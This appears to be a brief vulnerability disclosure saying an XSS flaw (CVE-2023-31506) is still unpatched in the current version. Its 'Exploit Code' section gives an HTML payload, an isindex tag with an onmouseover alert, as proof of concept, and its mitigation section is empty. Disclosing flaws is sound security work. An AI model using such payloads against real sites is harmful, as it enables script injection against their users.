The vulnerability also occurs in the current version because the previous vulnerability has not been patched.

Previous Vulnerabilities(CVE-2023-31506)

POC

image.png

Exploit Code

<isindex x="javascript:" onmouseover="alert('tyojong')">

image.png

Mitigation

References

https://m3n0sd0n4ld.github.io/patoHackventuras/cve-2023-31506